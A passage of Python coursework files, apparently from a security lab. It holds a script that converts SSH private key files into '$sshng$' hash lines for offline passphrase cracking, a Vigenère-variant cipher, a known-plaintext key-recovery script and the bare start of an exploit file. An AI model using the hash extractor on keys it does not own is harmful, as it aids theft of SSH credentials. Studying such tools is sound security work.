filler = '\xff'
s = filler * (4 - len(s) % 4) + s
for i in range(0, len(s), 4):
out = (out << 32) + struct.unpack('>I', s[i:i + 4])[0]
if negative:
out -= (1 << (8 * len(s)))
return out
def deflate_long(n, add_sign_padding=True):
"turns a long-int into a normalized byte string (adapted from Crypto.Util.number)"
# after much testing, this algorithm was deemed to be the fastest
s = ''
n = long(n)
while (n != 0) and (n != -1):
s = struct.pack('>I', n & 0xffffffff) + s
n = n >> 32
# strip off leading zeros, FFs
for i in enumerate(s):
if (n == 0) and (i[1] != '\000'):
break
if (n == -1) and (i[1] != '\xff'):
break
else:
# degenerate case, n was either 0 or -1
i = (0,)
if n == 0:
s = '\000'
else:
s = '\xff'
s = s[i[0]:]
if add_sign_padding:
if (n == 0) and (ord(s[0]) >= 0x80):
s = '\x00' + s
if (n == -1) and (ord(s[0]) < 0x80):
s = '\xff' + s
return s
def format_binary_weird(data):
out = ''
for i in enumerate(data):
out += '%02X' % ord(i[1])
if i[0] % 2:
out += ' '
if i[0] % 16 == 15:
out += '\n'
return out
def format_binary(data, prefix=''):
x = 0
out = []
while len(data) > x + 16:
out.append(format_binary_line(data[x:x + 16]))
x += 16
if x < len(data):
out.append(format_binary_line(data[x:]))
return [prefix + x for x in out]
def format_binary_line(data):
left = ' '.join(['%02X' % ord(c) for c in data])
right = ''.join([('.%c..' % c)[(ord(c) + 63) // 95] for c in data])
return '%-50s %s' % (left, right)
def hexify(s):
return hexlify(s).upper()
def unhexify(s):
return unhexlify(s)
def safe_string(s):
out = ''
for c in s:
if (ord(c) >= 32) and (ord(c) <= 127):
out += c
else:
out += '%%%02X' % ord(c)
return out
# ''.join([['%%%02X' % ord(c), c][(ord(c) >= 32) and (ord(c) <= 127)] for c in s])
def bit_length(n):
norm = deflate_long(n, 0)
hbyte = ord(norm[0])
if hbyte == 0:
return 1
bitlen = len(norm) * 8
while not (hbyte & 0x80):
hbyte <<= 1
bitlen -= 1
return bitlen
def tb_strings():
return ''.join(traceback.format_exception(*sys.exc_info())).split('\n')
def generate_key_bytes(hashclass, salt, key, nbytes):
"""
Given a password, passphrase, or other human-source key, scramble it
through a secure hash into some keyworthy bytes. This specific algorithm
is used for encrypting/decrypting private key files.
@param hashclass: class from L{Crypto.Hash} that can be used as a secure
hashing function (like C{MD5} or C{SHA}).
@type hashclass: L{Crypto.Hash}
@param salt: data to salt the hash with.
@type salt: string
@param key: human-entered password or passphrase.
@type key: string
@param nbytes: number of bytes to generate.
@type nbytes: int
@return: key data
@rtype: string
"""
keydata = ''
digest = ''
if len(salt) > 8:
salt = salt[:8]
while nbytes > 0:
hash_obj = hashclass()
if len(digest) > 0:
hash_obj.update(digest)
hash_obj.update(key)
hash_obj.update(salt)
digest = hash_obj.digest()
size = min(nbytes, len(digest))
keydata += digest[:size]
nbytes -= size
return keydata
"""
Common API for all public keys.
"""
class PKey (object):
"""
Base class for public keys.
"""
# known encryption types for private key files:
_CIPHER_TABLE = {
'AES-128-CBC': {'cipher': AES, 'keysize': 16, 'blocksize': 16, 'mode': AES.MODE_CBC},
'DES-EDE3-CBC': {'cipher': DES3, 'keysize': 24, 'blocksize': 8, 'mode': DES3.MODE_CBC},
'AES-256-CBC': {'cipher': AES, 'keysize': 32, 'blocksize': 16, 'mode': AES.MODE_CBC},
}
def __init__(self, msg=None, data=None):
"""
Create a new instance of this public key type. If C{msg} is given,
the key's public part(s) will be filled in from the message. If
C{data} is given, the key's public part(s) will be filled in from
the string.
@param msg: an optional SSH L{Message} containing a public key of this
type.
@type msg: L{Message}
@param data: an optional string containing a public key of this type
@type data: str
@raise SSHException: if a key cannot be created from the C{data} or
C{msg} given, or no key was passed in.
"""
pass
def __str__(self):
"""
Return a string of an SSH L{Message} made up of the public part(s) of
this key. This string is suitable for passing to L{__init__} to
re-create the key object later.
@return: string representation of an SSH key message.
@rtype: str
"""
return ''
def __cmp__(self, other):
"""
Compare this key to another. Returns 0 if this key is equivalent to
the given key, or non-0 if they are different. Only the public parts
of the key are compared, so a public key will compare equal to its
corresponding private key.
@param other: key to compare to.
@type other: L{PKey}
@return: 0 if the two keys are equivalent, non-0 otherwise.
@rtype: int
"""
hs = hash(self)
ho = hash(other)
if hs != ho:
return cmp(hs, ho)
return cmp(str(self), str(other))
def get_name(self):
"""
Return the name of this private key implementation.
@return: name of this private key type, in SSH terminology (for
example, C{"ssh-rsa"}).
@rtype: str
"""
return ''
def get_bits(self):
"""
Return the number of significant bits in this key. This is useful
for judging the relative security of a key.
@return: bits in the key.
@rtype: int
"""
return 0
def can_sign(self):
"""
Return C{True} if this key has the private part necessary for signing
data.
@return: C{True} if this is a private key.
@rtype: bool
"""
return False
def get_fingerprint(self):
"""
Return an MD5 fingerprint of the public part of this key. Nothing
secret is revealed.
@return: a 16-byte string (binary) of the MD5 fingerprint, in SSH
format.
@rtype: str
"""
return MD5.new(str(self)).digest()
def get_base64(self):
"""
Return a base64 string containing the public part of this key. Nothing
secret is revealed. This format is compatible with that used to store
public key files or recognized host keys.
@return: a base64 string containing the public part of the key.
@rtype: str
"""
return base64.encodestring(str(self)).replace('\n', '')
def sign_ssh_data(self, rng, data):
"""
Sign a blob of data with this private key, and return a L{Message}
representing an SSH signature message.
@param rng: a secure random number generator.
@type rng: L{Crypto.Util.rng.RandomPool}
@param data: the data to sign.
@type data: str
@return: an SSH signature message.
@rtype: L{Message}
"""
return ''
def verify_ssh_sig(self, data, msg):
"""
Given a blob of data, and an SSH message representing a signature of
that data, verify that it was signed with this key.
@param data: the data that was signed.
@type data: str
@param msg: an SSH signature message
@type msg: L{Message}
@return: C{True} if the signature verifies correctly; C{False}
otherwise.
@rtype: boolean
"""
return False
def from_private_key_file(cls, filename, password=None):
"""
Create a key object by reading a private key file. If the private
key is encrypted and C{password} is not C{None}, the given password
will be used to decrypt the key (otherwise L{PasswordRequiredException}
is thrown). Through the magic of python, this factory method will
exist in all subclasses of PKey (such as L{RSAKey} or L{DSSKey}), but
is useless on the abstract PKey class.
@param filename: name of the file to read
@type filename: str
@param password: an optional password to use to decrypt the key file,
if it's encrypted
@type password: str
@return: a new key object based on the given private key
@rtype: L{PKey}
@raise IOError: if there was an error reading the file
@raise PasswordRequiredException: if the private key file is
encrypted, and C{password} is C{None}
@raise SSHException: if the key file is invalid
"""
key = cls(filename=filename, password=password)
return key
from_private_key_file = classmethod(from_private_key_file)
def from_private_key(cls, file_obj, password=None):
"""
Create a key object by reading a private key from a file (or file-like)
object. If the private key is encrypted and C{password} is not C{None},
the given password will be used to decrypt the key (otherwise
L{PasswordRequiredException} is thrown).
@param file_obj: the file to read from
@type file_obj: file
@param password: an optional password to use to decrypt the key, if it's
encrypted
@type password: str
@return: a new key object based on the given private key
@rtype: L{PKey}
@raise IOError: if there was an error reading the key
@raise PasswordRequiredException: if the private key file is encrypted,
and C{password} is C{None}
@raise SSHException: if the key file is invalid
"""
key = cls(file_obj=file_obj, password=password)
return key
from_private_key = classmethod(from_private_key)
def _read_private_key_file(self, tag, filename, password=None):
"""
Read an SSH2-format private key file, looking for a string of the type
C{"BEGIN xxx PRIVATE KEY"} for some C{xxx}, base64-decode the text we
find, and return it as a string. If the private key is encrypted and
C{password} is not C{None}, the given password will be used to decrypt
the key (otherwise L{PasswordRequiredException} is thrown).
@param tag: C{"RSA"} or C{"DSA"}, the tag used to mark the data block.
@type tag: str
@param filename: name of the file to read.
@type filename: str
@param password: an optional password to use to decrypt the key file,
if it's encrypted.
@type password: str
@return: data blob that makes up the private key.
@rtype: str
@raise IOError: if there was an error reading the file.
@raise PasswordRequiredException: if the private key file is
encrypted, and C{password} is C{None}.
@raise SSHException: if the key file is invalid.
"""
try:
f = open(filename, 'r')
except IOError:
e = sys.exc_info()[1]
sys.stdout.write("%s\n" % str(e))
return
data = self._read_private_key(tag, f, password)
f.close()
return data
def _read_private_key(self, tag, f, password=None):
lines = f.readlines()
if "BEGIN RSA PRIVATE" in lines[0]:
tag = "RSA"
self.type = 0
elif "-----BEGIN OPENSSH PRIVATE KEY-----" in lines[0]:
self.type = 2 # bcrypt pbkdf + aes-256-cbc
else:
self.type = 1
tag = "DSA"
start = 0
while (start < len(lines)) and ((lines[start].strip() != '-----BEGIN ' + tag + ' PRIVATE KEY-----') and (lines[start].strip() != '-----BEGIN OPENSSH PRIVATE KEY-----')):
start += 1
if start >= len(lines):
sys.stdout.write("%s is not a valid private key file\n" % f.name)
return None
# parse any headers first
headers = {}
start += 1
while start < len(lines):
l = lines[start].split(': ')
if len(l) == 1:
break
headers[l[0].lower()] = l[1].strip()
start += 1
# find end
end = start
while ((lines[end].strip() != '-----END OPENSSH PRIVATE KEY-----') and (lines[end].strip() != '-----END ' + tag + ' PRIVATE KEY-----')) and (end < len(lines)):
end += 1
# if we trudged to the end of the file, just try to cope.
try:
data = ''.join(lines[start:end]).encode()
data = base64.decodestring(data)
except base64.binascii.Error:
e = sys.exc_info()[1]
raise SSHException('base64 decoding error: ' + str(e))
if 'proc-type' not in headers and self.type != 2:
# unencryped: done
sys.stderr.write("%s has no password!\n" % f.name)
return None
# encrypted keyfile: will need a password
if self.type !=2 and headers['proc-type'] != '4,ENCRYPTED':
raise SSHException('Unknown private key structure "%s"' % headers['proc-type'])
try:
encryption_type, saltstr = headers['dek-info'].split(',')
except:
if self.type != 2:
raise SSHException('Can\'t parse DEK-info in private key file')
else:
encryption_type = "AES-256-CBC"
saltstr = "fefe"
if encryption_type not in self._CIPHER_TABLE:
raise SSHException('Unknown private key cipher "%s"' % encryption_type)
# if no password was passed in, raise an exception pointing out that we need one
if password is None:
raise PasswordRequiredException('Private key file is encrypted')
cipher = self._CIPHER_TABLE[encryption_type]['cipher']
keysize = self._CIPHER_TABLE[encryption_type]['keysize']
mode = self._CIPHER_TABLE[encryption_type]['mode']
if self.type == 2:
salt_offset = 47 # XXX is this fixed?
salt_length = 16
saltstr = data[salt_offset:salt_offset+salt_length].encode("hex")
data = binascii.hexlify(data).decode("ascii")
if keysize == 24:
self.hashline = "%s:$sshng$%s$%s$%s$%s$%s" % (f.name, 0,
len(salt), saltstr, len(data) // 2, data)
elif keysize == 16:
self.hashline = "%s:$sshng$%s$%s$%s$%s$%s" % (f.name, 1, len(saltstr) // 2,
saltstr, len(data) // 2, data)
elif keysize == 32 and self.type == 2: # bcrypt pbkdf + aes-256-cbc
# round value appears after salt
rounds = 16
self.hashline = "%s:$sshng$%s$%s$%s$%s$%s$%d" % (f.name, 2, len(saltstr) // 2,
saltstr, len(data) // 2, data, rounds)
else:
sys.stderr.write("%s uses unsupported cipher, please file a bug!\n" % f.name)
return None
if not limited:
key = generate_key_bytes(MD5, salt, password, keysize)
data = cipher.new(key, mode, salt).decrypt(data)
# check encoding
try:
d = PKCS7Encoder()
ddata = d.decode(data)
return ddata
except ValueError: # incorrect password
return data
return self.hashline # dummy value
def chunks(l, n):
for i in xrange(0, len(l), n):
yield l[i:i + n]
class RSADSSKey (PKey):
def __init__(self, msg=None, data=None, filename=None, password=None, vals=None, file_obj=None):
self.n = None
self.e = None
self.d = None
self.p = None
self.q = None
if file_obj is not None:
self._from_private_key(file_obj, password)
return
if filename is not None:
self._from_private_key_file(filename, password)
return
if vals is not None:
self.e, self.n = vals
self.size = bit_length(self.n)
def __hash__(self):
h = hash(self.get_name())
h = h * 37 + hash(self.e)
h = h * 37 + hash(self.n)
return hash(h)
def get_name(self):
return 'ssh-rsa'
def get_bits(self):
return self.size
### internals...
def _from_private_key_file(self, filename, password):
data = self._read_private_key_file('RSA', filename, password)
if not data:
return
if limited:
sys.stdout.write("%s\n" % self.hashline)
return
try:
if self.type == 0:
self._decode_key(data)
else:
self._decode_dss_key(data)
sys.stderr.write("%s has no password!\n" % filename)
except SSHException:
sys.stdout.write("%s\n" % self.hashline)
def _from_private_key(self, file_obj, password):
"""used for converting older format hashes"""
data = self._read_private_key('RSA', file_obj, password)
if limited:
sys.stdout.write("%s\n" % self.hashline)
return
try:
if self.type == 0:
self._decode_key(data)
else:
self._decode_dss_key(data)
sys.stderr.write("%s has no password!\n" % file_obj.name)
except SSHException:
sys.stdout.write("%s\n" % self.hashline)
def _decode_key(self, data):
# private key file contains:
# RSAPrivateKey = { version = 0, n, e, d, p, q, d mod p-1, d mod q-1, q**-1 mod p }
try:
keylist = BER(data).decode()
except BERException:
raise SSHException('Unable to parse key file')
if (type(keylist) is not list) or (len(keylist) < 4) or (keylist[0] != 0):
raise SSHException('Not a valid RSA private key file (bad ber encoding)')
self.n = keylist[1]
self.e = keylist[2]
self.d = keylist[3]
# not really needed
self.p = keylist[4]
self.q = keylist[5]
self.size = bit_length(self.n)
def _decode_dss_key(self, data):
# private key file contains:
# DSAPrivateKey = { version = 0, p, q, g, y, x }
try:
keylist = BER(data).decode()
except BERException:
e = sys.exc_info()[1]
raise SSHException('Unable to parse key file: ' + str(e))
if (type(keylist) is not list) or (len(keylist) < 6) or \
(keylist[0] != 0):
raise SSHException('not a valid DSA private key file (bad ber encoding)')
self.p = keylist[1]
self.q = keylist[2]
self.g = keylist[3]
self.y = keylist[4]
self.x = keylist[5]
self.size = bit_length(self.p)
# PKCS7Encoder is borrowed from http://japrogbits.blogspot.in/
class PKCS7Encoder(object):
'''
RFC 2315: PKCS#7 page 21
Some content-encryption algorithms assume the
input length is a multiple of k octets, where k > 1, and
let the application define a method for handling inputs
whose lengths are not a multiple of k octets. For such
algorithms, the method shall be to pad the input at the
trailing end with k - (l mod k) octets all having value k -
(l mod k), where l is the length of the input. In other
words, the input is padded at the trailing end with one of
the following strings:
01 -- if l mod k = k-1
02 02 -- if l mod k = k-2
.
.
.
k k ... k k -- if l mod k = 0
The padding can be removed unambiguously since all input is
padded and no padding string is a suffix of another. This
padding method is well-defined if and only if k < 256;
methods for larger k are an open issue for further study.
'''
def __init__(self, k=16):
self.k = k
## @param text The padded text for which the padding is to be removed.
# @exception ValueError Raised when the input padding is missing or corrupt.
def decode(self, text):
'''
Remove the PKCS#7 padding from a text string
'''
nl = len(text)
val = int(binascii.hexlify(text[-1]), 16)
if val > self.k:
raise ValueError('Input is not padded or padding is corrupt')
l = nl - val
return text[:l]
## @param text The text to encode.
def encode(self, text):
'''
Pad an input string according to PKCS#7
'''
l = len(text)
output = StringIO()
val = self.k - (l % self.k)
for _ in xrange(val):
output.write('%02x' % val)
return text + binascii.unhexlify(output.getvalue())
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.stdout.write("Usage: %s < RSA/DSA private key files >\n" % \
sys.argv[0])
for filename in sys.argv[1:]:
key = RSADSSKey.from_private_key_file(filename, '')
```
#### File: lab1/part1/vigenere.py
```python
__all__ = ["vigenere_encrypt", "vigenere_decrypt"]
# ------------------------------- MODULE INFO ---------------------------------
# --------------------------------- MODULES -----------------------------------
import argparse
import struct
from itertools import cycle
# --------------------------------- MODULES -----------------------------------
# ---------------------------- GLOBAL CONSTANTS -------------------------------
# Match mapping indexes to fit the range for platintext and key characters
MAPPING = (
(0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe),
(0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0),
(0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7),
(0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa),
(0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4),
(0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3),
(0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1),
(0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf),
(0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2),
(0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5),
(0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb),
(0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6),
(0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8),
(0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9),
(0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd),
(0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc)
)
# The first index is the column index in the 'mapping';
# the second index is actual cipher byte resides in the 'mapping'.
# To find the row index after knowing column index and cipher byte:
# inverted_mapping[column][cipher_byte]
INVERTED_MAPPING = {key: dict() for key in range(len(MAPPING[0]))}
# ---------------------------- GLOBAL CONSTANTS -------------------------------
# -------------------------------- FUNCTIONS ----------------------------------
def vigenere_encrypt(output_file_name: str, input_file_name: str, key: str):
"""
Encrypts the file with 'input_file_name' with the given full 'key' and
writes the output to file with 'output_file_name'.
"""
with open(output_file_name, "wb") as output_file:
for byte in map(_byte_encrypt, bytes_get(input_file_name), cycle(key)):
output_file.write(byte)
def vigenere_decrypt(output_file_name: str, input_file_name: str, key: str):
"""
Decrypts the file with 'input_file_name' with the given full 'key' and
writes the output to file with 'output_file_name'.
"""
with open(output_file_name, "wb") as output_file:
for byte in map(_byte_decrypt, bytes_get(input_file_name), cycle(key)):
output_file.write(byte)
def _byte_encrypt(clear_text_byte: int, subkey: str) -> bytes:
"""
Encrypts the given 'clear_text_byte' with the 'subkey' specified using
one variant of the Vigenère cipher.
NOTE: The 'subkey' is a single character of the whole Vigenère key;
for example, 'c' is the first subkey of the key 'cipher'.
It is the caller's responsibility to pass the correct 'subkey' for a given
'clear_text_byte' and ensures the "wrap-around" behavior of 'subkey'.
"""
# if not all(isinstance(arg, int) for arg in locals().values()):
# raise TypeError("'clear_text_byte' must be of 'int' type")
if not isinstance(clear_text_byte, int):
raise TypeError("'clear_text_byte' must be of 'int' type")
if clear_text_byte not in range(1 << 8):
raise ValueError("'clear_text_byte' must be in range [0, 1 << 8)")
if not isinstance(subkey, str):
raise TypeError("'subkey' must be of 'str' type")
if 1 != len(subkey):
raise ValueError("'subkey' must be a single character 'str' type")
subkey_value = ord(subkey)
high_mask = 0b11110000
low_mask = high_mask >> 4
plain_high = (clear_text_byte & high_mask) >> 4
plain_low = clear_text_byte & low_mask
subkey_high = (subkey_value & high_mask) >> 4
subkey_low = subkey_value & low_mask
cipher_high = MAPPING[plain_high][subkey_low] << 4
cipher_low = MAPPING[plain_low][subkey_high]
# To convert an 'int' to a 'bytes' object properly in python 3,
# use the call pattern of bytes([0x9a])
cipher_byte = bytes([cipher_high | cipher_low])
return cipher_byte
def _byte_decrypt(cipher_text_byte: int, subkey: str) -> bytes:
"""
Decrypts the given 'cipher_text_byte' with the 'subkey' specified using
one variant of the Vigenère cipher.
NOTE: The 'subkey' is a single character of the whole Vigenère key;
for example, 'c' is the first subkey of the key 'cipher'.
It is the caller's responsibility to pass the correct 'subkey' for a given
'cipher_text_byte' and ensures the "wrap-around" behavior of 'subkey'.
"""
if not isinstance(cipher_text_byte, int):
raise TypeError("'cipher_text_byte' must be of 'int' type")
if cipher_text_byte not in range(1 << 8):
raise ValueError("'cipher_text_byte' must be in range [0, 1 << 8)")
if not isinstance(subkey, str):
raise TypeError("'subkey' must be of 'str' type")
if 1 != len(subkey):
raise ValueError("'subkey' must be a single character 'str' type")
subkey_value = ord(subkey)
high_mask = 0b11110000
low_mask = high_mask >> 4
cipher_high = (cipher_text_byte & high_mask) >> 4
cipher_low = cipher_text_byte & low_mask
subkey_high = (subkey_value & high_mask) >> 4
subkey_low = subkey_value & low_mask
plain_high = INVERTED_MAPPING[subkey_low][cipher_high] << 4
plain_low = INVERTED_MAPPING[subkey_high][cipher_low]
plain_byte = bytes([plain_high | plain_low])
return plain_byte
def bytes_get(file_name: str) -> int:
"""
Returns a generator that gets one byte of the given 'file_name'
at a time.
"""
if not isinstance(file_name, str):
raise TypeError("'file_name' argument must be of 'str' type")
with open(file_name, "rb") as input_file:
while True:
# Read a single byte at a time
byte = input_file.read(1)
if not byte:
break
yield struct.unpack("B", byte)[0]
# NOTE: the following only works in python version >= 3.5
# yield int(byte.hex(), base=16)
def main():
"""
Main command-line driver.
"""
cli_description = "Encrypt/decrypt a file with the Vigenère cipher"
parser = argparse.ArgumentParser(description=cli_description)
group = parser.add_mutually_exclusive_group()
parser.add_argument("file",
type=str,
nargs="?",
help="file to be encrypted/decrypted")
group.add_argument("-d",
"--decrypt",
type=str,
required=False,
help="file name of the decrypted output")
group.add_argument("-e",
"--encrypt",
type=str,
required=False,
help="file name of the encrypted output")
parser.add_argument("-k",
"--key",
type=str,
required=True,
help="key to encrypt/decrypt the Vigenère variant")
args = parser.parse_args()
if args.decrypt:
print("Decrypted output is " + args.decrypt)
vigenere_decrypt(args.decrypt, args.file, args.key)
elif args.encrypt:
print("Encrypted output is " + args.encrypt)
vigenere_encrypt(args.encrypt, args.file, args.key)
# List all the non-private attributes
# for attr in filter(lambda attr: not attr.startswith("_"), dir(args)):
# if getattr(args, attr):
# print(getattr(args, attr))
if __name__ == "__main__":
for column in range(len(MAPPING[0])):
for row in range(len(MAPPING)):
INVERTED_MAPPING[column][MAPPING[row][column]] = row
main()
# -------------------------------- FUNCTIONS ----------------------------------
```
#### File: lab1/part2/part2.1.py
```python
import sys
# mapping used for Lab 1
# NOTE 'map' identifier is a builtin function of python3
mapping = [
[0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe],
[0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0],
[0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7],
[0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa],
[0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4],
[0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3],
[0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1],
[0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf],
[0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2],
[0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5],
[0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb],
[0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6],
[0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8],
[0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9],
[0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd],
[0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc]
]
# Dictionary with keys of file type extension and values of tuples
# in the format of:
# (number of bytes to read from the offset 0 of files, matching bytes pattern)
SIGNATURE_TABLE = {
# Compound File Binary Format - doc, xls, ppt
"doc": (8, bytes([0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1])),
# Zip File Format - zip, docx, xlsx, pptx
"docx": (2, bytes([0x50, 0x4B])),
# PDF Document - pdf
"pdf": (4, bytes([0x25, 0x50, 0x44, 0x46])),
# PostScript Document - ps
"ps": (4, bytes([0x25, 0x21, 0x50, 0x53])),
# Bytes 4 and 5 are wildcards and could be anything
"jpg": (11, bytes([0xFF, 0xD8, 0xFF, 0xE1, 0x00, 0x00, 0x45, 0x78, 0x69, 0x66, 0x00]))
}
# Largest amount of bytes to read based on the given signatures
MAX_BYTES_TO_READ = 11
# Used for storing possible keys for various file signatures in SIGNATURE_TABLE
KEY_TABLE = {}
# Key for ciphertext2
KEY_BYTES = bytes([0x35, 0x33, 0x2E, 0x35, 0x30, 0x33, 0x35, 0x36, 0x33, 0x4E, 0x2C, 0x2D, 0x31, 0x31, 0x33, 0x2E, 0x35, 0x32, 0x38, 0x38, 0x39, 0x34, 0x57])
KEY_LENGTH = 23
# Key is any combination of printable characters 0x20 to 0x7F
#
# Key higher bit value must be 2,3,4,5,6 or 7
#
# Plaintext characters from ASCII hex values range from 0x00 to 0x7F
#
# Plaintext higher bit value must be 0,1,2,3,4,5,6 or 7
#
# ph <- higher 4 bits of plaintext
# pl <- lower 4 bits of plaintext
#
# kh <- higher 4 bits of key
# kl <- lower 4 bits of key
#
# ch <- mapping[ph][kl]
# cl <- mapping[pl][kh]
# c <- 0x(ch)(cl)
#
#
# Match mapping indexes to fit the range for platintext and key characters
def plaintextByte(mapping, ch, cl, kh, kl):
"""
This method converts a given ch and cl, into a ph and pl with using a kh and kl.
Returns the plaintext byte.
"""
for i, x in enumerate(mapping):
for j, y in enumerate(x):
if (j == kh) and (j == kl) and (mapping[i][kh] == cl) and (mapping[i][kl] == ch):
pl = i
ph = i
elif (j == kh) and (mapping[i][kh] == cl):
pl = i
elif (j == kl) and (mapping[i][kl] == ch):
ph = i
return ((ph << 4) + pl)
def getKeyFromPlainAndCipher(mapping, ph, pl, ch, cl):
"""
Given a known plaintext byte and known ciphertext byte, find the key byte.
"""
for i, x in enumerate(mapping):
for j, y in enumerate(x):
if (i == ph) and (mapping[ph][j] == ch):
kl = j
if (i == pl) and (mapping[pl][j] == cl):
kh = j
return ((kh << 4) + kl)
def checkFileHeader():
"""
This method will check all of the given file headers in SIGNATURE_TABLE and
add to KEY_TABLE what the start of the key would have to be to decrypt to a
certain header.
"""
# Get the header of the file
cFile = open(sys.argv[1], "rb")
encHeader = cFile.read(MAX_BYTES_TO_READ)
cFile.close()
print("Checking against hard coded signatures...")
for fileType, infoTuple in SIGNATURE_TABLE.items():
keylst = []
bytesToExam, matchBytes = infoTuple
for i in range (bytesToExam):
cByte = encHeader[i]
ch = cByte >> 4
cl = cByte & 15
pByte = matchBytes[i]
ph = pByte >> 4
pl = pByte & 15
k = getKeyFromPlainAndCipher(mapping, ph, pl, ch, cl)
keylst.append(k)
sys.stdout.write("{0}: ".format(fileType))
first = True
for byte in keylst:
if first:
sys.stdout.write("[{0}".format(format(byte, '02x')))
first = False
else:
sys.stdout.write(", {0}".format(format(byte, '02x')))
sys.stdout.write("]\n")
KEY_TABLE[fileType] = (bytesToExam, keylst)
print("All signatures checked!")
def decrypt():
"""
This method decrypts the given ciphertext file using the hardcoded key.
"""
print("Starting decryption with hardcoded key...")
cipherfn = sys.argv[1]
plainfn = sys.argv[2]
pfile = open(plainfn, "wb")
with open(cipherfn, "rb") as cipherfile:
i = 0
while True:
byte = cipherfile.read(1)
if not byte:
break
int_byte = ord(byte)
ch = int_byte >> 4
cl = int_byte & 15
k = KEY_BYTES[i]
kh = k >> 4
kl = k & 15
p = plaintextByte(mapping, ch, cl, kh, kl)
pfile.write(bytes([p]))
i += 1
if i == KEY_LENGTH:
i = 0
pfile.close()
print("Decryption finished!")
return
def main():
if len(sys.argv) == 1:
print("No cipherfile input added")
sys.exit(2)
if len(sys.argv) == 2:
print("No output file added")
sys.exit(2)
checkFileHeader()
decrypt()
return
if __name__ == "__main__":
main()
```
#### File: lab3/part2/exploit.py
```python
__all__ = ["buffer_exploit"]
# ------------------------------- MODULE INFO ---------------------------------
# --------------------------------- MODULES -----------------------------------
import argparse
import shutil
import signal
import subprocess
# --------------------------------- MODULES -----------------------------------
# ------------------------------ TYPE ALIASES ---------------------------------
# ------------------------------ TYPE ALIASES ---------------------------------
